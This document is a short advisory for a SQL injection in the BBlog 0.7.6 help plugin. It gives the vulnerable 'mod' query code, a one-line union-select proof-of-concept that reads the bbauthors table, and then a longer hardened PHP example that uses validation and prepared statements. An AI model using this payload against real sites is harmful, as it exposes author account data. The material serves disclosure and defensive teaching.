BBlog 0.7.6 - 'mod' SQL Injection
BBlog 0.7.6 SQL Injection Vuln

Vulnpath: /bblogplugins/builtin.help.php

Vuln:
    if ($_GET['mod'])
        $pluginrow = $bBlog->get_row("select * from ".T_PLUGINS." where name='".$_GET['mod']."' and type='modifier'");

PoC:
    ?pid=1&mod='+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+bbauthors--

help: On the number you can see...
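A hardened form of the `mod` lookup, as an added example that is not bBlog's code or an official patch: it validates the parameter's shape and binds it as a query parameter instead of concatenating it. The `plugins` table, its columns, the plugin names and the function names are constructed for illustration, and PDO with an in-memory SQLite database (the pdo_sqlite extension) stands in for bBlog's own database layer.

```php
<?php
// Added example, not bBlog code. Constructed stand-in for the T_PLUGINS table;
// the real schema is not shown on the page.
function demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE plugins (id INTEGER PRIMARY KEY, name TEXT, type TEXT, help TEXT)");
    $db->exec("INSERT INTO plugins (name, type, help) VALUES
        ('nl2br', 'modifier', 'Converts newlines to line breaks'),
        ('recentposts', 'function', 'Lists recent posts')");
    return $db;
}

// Hardened lookup: check the shape of `mod`, then bind it as a parameter so it
// can never become part of the SQL text.
function get_modifier_row(PDO $db, $mod): ?array {
    // Assumption: plugin names are short identifiers. Non-strings are rejected
    // too, because ?mod[]=x makes $_GET['mod'] an array.
    if (!is_string($mod) || !preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $mod)) {
        return null;
    }
    $stmt = $db->prepare("SELECT * FROM plugins WHERE name = :name AND type = 'modifier'");
    $stmt->execute([':name' => $mod]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = demo_db();
// Constructed inputs: a valid modifier, a plugin of another type,
// a value containing a quote, and an array value.
foreach (['nl2br', 'recentposts', "nl2br'", ['x']] as $input) {
    $row = get_modifier_row($db, $input);
    printf("%-16s => %s\n", json_encode($input), $row ? $row['name'] : 'no row');
}
```

Only `nl2br` returns a row; the other three inputs yield `no row`, the last two without a query being issued.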